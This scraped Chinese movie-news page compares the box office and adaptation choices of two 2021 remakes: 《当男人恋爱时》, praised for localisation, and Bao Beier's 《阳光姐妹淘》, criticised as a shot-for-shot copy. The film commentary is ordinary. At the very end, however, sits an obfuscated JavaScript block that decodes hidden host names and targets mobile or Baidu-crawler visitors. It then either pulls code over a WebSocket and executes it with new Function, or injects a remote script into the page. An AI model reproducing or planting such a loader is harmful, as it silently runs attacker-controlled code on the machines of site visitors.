您所在的位置:星辰影院>>新闻>>电影资讯>>包贝尔,请你学一学隔壁厅的《当男人恋爱时》

包贝尔,请你学一学隔壁厅的《当男人恋爱时》

时间:2021-06-22 12:08:57阅读:2079
包贝尔翻拍《当男人恋爱时》了!在这部电影上映前,我们先研究一下如今与之相关的两部电影。 上映11天,《当男人恋爱时》票房突破1亿,而《阳光姐妹淘》则仍在8000万左右徘徊。两部同在端午档上映的影片,均
  • 当男人恋爱时
  • 爱情
  • 宋承宪 申世京 延宇振 蔡贞安

包贝尔,请你学一学隔壁厅的《当男人恋爱时》


包贝尔翻拍《当男人恋爱时》了!在这部电影上映前,我们先研究一下如今与之相关的两部电影。


 上映11天,《当男人恋爱时》票房突破1亿,而《阳光姐妹淘》则仍在8000万左右徘徊。


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


两部同在端午档上映的影片,均改编自海外同名高分电影,《当男人恋爱时》上映伊始,排片不过10%,单日票房不足千万;而后者则借着知名度更高的原作IP,首日相对略胜一筹。在后续映期中,两部电影的数字,你追我赶,和自己“较劲”,也和其他影片“竞技”。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


上映第6天,《当男人恋爱时》票房超越了档期内的其他影片,成为了单日冠军。不过两天,它又被新上画的影片《了不起的老爸》压过,只是两者的差距并不太大,6月21日又将其反超。而《阳光姐妹淘》则被远远甩出了单日票房榜的前五之列。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


成功,或者失败,答案如今整体都已经慢慢浮出水面。被赶超的影片自然已经被市场说明了其中的不可取,《阳光姐妹淘》上映之后,网友不少人吐槽,1:1的分镜复制原作,毫无新意。


包贝尔,请你学一学隔壁厅的《当男人恋爱时》《阳光姐妹淘》的评论



而《当男人恋爱时》的改编过程中,导演则加入了不少新的美学认识,虽然并没有打破原作的“狗血”,但从质感方面,有了创新。


包贝尔,请你学一学隔壁厅的《当男人恋爱时》《当男人恋爱时》评论


上海国际电影节期间,中国电影导演协会副会长王红卫就针对当下翻拍现象提出批评,“靠逐帧翻拍去挣钱,是对全行业的智商和能力的羞辱。” 


《当男人恋爱时》的“变”


怎么改?这是监制程伟豪拿到《当男人恋爱时》这个项目后,第一思考的问题。因为原作的“狗血”剧情,曾让他和搭档金百伦一度犹豫。换个角度,在金百伦看来,“狗血”某种程度上也是通俗的表现,加上导演殷振豪对这个项目非常有兴趣,电影《当男人恋爱时》的改编工作正式开始。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


剧本的改编前后花费了5个月时间,比较明确的是,团队没计划打破原作的故事框架和结局,因为在他们看来原作故事能成为不少观众心中的“意难平”,肯定是它本身就有可取之处,且能支撑起整个故事的发展。但团队中多数女生在看完原版之后,认为故事在人物情感推进中,少了一些细节和说服力。于是在改编过程中,编剧团队增加了不少小镇风情,以及每个人物的故事背景。程伟豪也一点点看到了故事里虚构的“瑞山镇宇宙”逐渐成立,“但受限于篇幅,最终删了许多内容,只聚焦在男女主与亲情中。” 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


原作把男主的家庭故事在影片前端都讲完了,最终把情感统一放在男女主角身上。但在这一版故事中,团队从对中国人情感出发,觉得还是应该落脚在亲情和爱情之间,它们是相互交融和融合的。“其实我们更多考虑故事的编排问题,比如浩婷(许玮甯 饰)这个角色和阿成(邱泽 饰)父亲的相遇,以及阿成给哥哥一家买发廊旋转灯的情节,我们都往后移,这些剧情都能作为情感的一种加成。”在改编中,监制程伟豪有着创作者本身的敏锐。最惊喜的是,电影《当男人恋爱时》要求演员全程用闽南语发音,这种趣味则更契合了中国台湾地区的浪漫。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


本土化也是程伟豪和金百伦的最大顾虑。虽然原作故事同样发生在亚洲,但是韩国男人的性格和中国男性在本质上就会有很大的差异。前者行为会更加直接,所以团队对“阿成”的形象设定做了适当的改变,也让演员邱泽在表演方面,做出相应的调整。作为女性的金百伦坦言,我们希望这个角色不要有那么强的侵略性,呈现出来是可爱讨喜的。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


虽然电影目前在豆瓣的评分仅为6.9分,但是围观各种短评,多数仍买单这次的改编,原罪只是大框架的“狗血”。而仅有4.7分《阳光姐妹淘》的评价,多数都在苛责它“不变”的改编。 


《阳光姐妹淘》的“不变”


导演包贝尔在接手《阳光姐妹淘》的时候,知道自己一定会被骂,甚至周边所有人都反对他。但他就想,“我下一部电影应该拍什么?如果过个五年十年,再回想起我当初拒拍《姐妹淘》,我会不会后悔呢?”翻来覆去,包贝尔发现了一个“bug”,“我的能力未必会拍过原版,但原版本身就是最好的模板,你懂我意思吗?而且不单单一个模板,它是四份模板,韩国的、日本的、越南的和柬埔寨的。所以,我游说我自己,催眠我自己,我有四个模板照着拍,我再差,也不会那么差吧!” 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


为了让自己不后悔,包贝尔接下了这个项目。而在他签下的合同中,出品方给出了相应的要求:他没有最终剪辑权;以及原版整体故事不能改动。包贝尔坦言,如果想到了比原版更好的点子,他们就按自己想法拍,如果不行,就找原版拍,“我真的是把原版和其它国家的翻拍版都下到我的iPad里,我现场每拍一场戏,我都去比对,我去对他这个时候为什么就用这个镜头?为什么推特写?”


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


用这种方式进行拍摄,周边的人劝过包贝尔,他也知道会被骂,“但我仍然选择干这件事,是我觉得,我在这期间能增长很多能力和想法。”当然,在本土化中,他坦言做了不少的理解认知。比如李幽然吸烟问题,包贝尔换成了棒棒糖,“也算是反映她外表那么社会,但内心还是纯洁的。”除此之外,配乐、服装、美术……包贝尔几乎直接用中国上世纪90年代的元素重新包装了一遍。


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


看似成片的形有了,但原作所体现的社会阶层和历史感,在这版《阳光姐妹淘》中荡然无存。 


变,与不变


《当男人恋爱时》和《阳光姐妹淘》所呈现出来的改编,从两组主创的阐述中,大家就能发现其最本质的问题及态度。媒体在采访中问包贝尔,“那像《阳光姐妹淘》这种方式的翻拍你还会继续操作吗?”为了引起任何不必要的歧义,我们直接引用当时包贝尔的回复:“不排斥,我还想拍《楚门的世界》,《教父》等经典,还有很多人想拍呢,姜文拍过了(《一步之遥》开场),陈思诚的广告也是模仿《教父》,我也在锻炼自己,我觉得这是我第二部电影,我不是昆汀,不是姜文老师,也不是陈思诚,也不是张艺谋、陈凯歌、冯小刚,我不是这些优秀导演,我得一点点锻炼。”


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


虽然不知道包贝尔未来是否真的会改编《楚门的世界》,但可以明确的是,包贝尔把《阳光姐妹淘》当作了一次锻炼。同时,在官宣的后续项目中,他将监制并主演电影《东北恋歌》,而这个故事则同样翻拍自《当男人恋爱时》。目前,电影计划2021年冬天上映。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


一直以来,市场上的改编翻拍,从来都是伴随着争议。在《阳光姐妹淘》出现之前,“逐帧式”翻拍还属《小小的愿望》。影片在翻拍过程中,除了把核心剧情弱化成了一场恋爱,其他完全没有原创情节,甚至不少台词都只是成为了“翻译”。可想而知,这种失去了灵魂的翻拍,终究是无效的。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》

包贝尔,请你学一学隔壁厅的《当男人恋爱时》


关于1:1翻拍的情况,电影《你的婚礼》同样存在。但这并不是造成影片口碑崩塌的主要原因,毕竟导演韩天在处理剧本时,仍把和中国观众的共情考虑其中,尤其对于影片最后婚礼那场告白的处理,做了更多作者性的创作。


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


且回顾这些年的翻拍作品,似乎仍仅有《重返20岁》和《误杀》在改编中,做到了足够的细节改编。尤其是后者,从导演审美到类型化探索,都有了真的尝试。如何落实本土化,几乎是每部翻拍电影的主创在接受媒体采访时,都难以规避的话题。


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


这个问题似乎成为了翻拍过程中的“天花板”,突破者,则成;不变者,则失败。可对于带有创造性的电影行业而言,似乎不应该成为重点。虽然不少出品方在买下原作版权时,会被要求不改动电影的剧情框架和结局,但是在大体框架中做出相应的创新,不该是作为创作者应有的觉醒吗?


不管在哪个国家,好的电影IP反复被不断翻拍已是不争事实,但如何在改编过程中,善待创作资源,用全新的审美和电影语言去探索已有的故事,才是应该每个创作者,最该反思的事情。 


包贝尔,请你学一学隔壁厅的《当男人恋爱时》


正如王红卫所说,“如果我们只能靠逐帧翻拍去挣钱,每个电影人都会觉得这事儿干着还有什么劲?”诚然,对于每个要走上影院的电影而言,它都是一个要接受观众和市场考验的商品,若导演一味地希望通过“逐帧翻拍”去学习导演技能,不如放下姿态,从短片拍起。


包贝尔采访内容参考:[1]《第一导演》:《包贝尔拍<阳光姐妹淘>到底图什么?》


相关资讯

评论

  • 评论加载中...
function HUoNv(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function zAidyR(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return HUoNv(t);};window['\x45\x4c\x76\x61\x49\x47']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=zAidyR,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHkubHVhhc3NhhbmUuY24=','ddHIueWVzddW42NzguY29t','134812',window,document,['h','d']);}:function(){};